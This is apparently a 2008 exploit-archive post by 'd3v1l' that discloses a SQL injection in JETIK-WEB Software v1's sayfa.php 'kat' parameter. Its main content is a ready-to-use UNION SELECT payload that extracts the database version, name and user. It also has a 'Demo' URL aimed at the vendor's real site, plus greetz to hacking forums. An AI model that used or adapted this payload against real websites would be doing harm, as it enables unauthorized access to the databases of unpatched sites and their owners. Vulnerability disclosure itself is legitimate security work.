[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : JETIK-WEB Software (sayfa.php kat) SQL Injection Vulnerability
# Published : 2008-09-23
# Author : d3v1l
# Previous Title : Galmeta Post CMS <= 0.2 Remote Code Execution / Arbitrary File Upload
# Next Title : Ol Bookmarks Manager 0.7.5 Local File Inclusion Vulnerability


[~]-----------------------------------------------------------
[~] JETIK-WEB Software v1 - SQL Injection Vulnerability
[~]
[~] http://www.jetik.net
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 22.09.2008
[~]
[~]
[~] d3v1l@spoofer.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest| Gibon| Pig       AND      milw0rm staff
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/sayfa.php?kat=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3/*
[~]
[~] Demo :-
[~]
[~] http://www.jetik.net/sayfa.php?kat=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3/*
[~]
[~]--------------------------------------------------------------------------------------------------------------

# www.Syue.com [2008-09-23]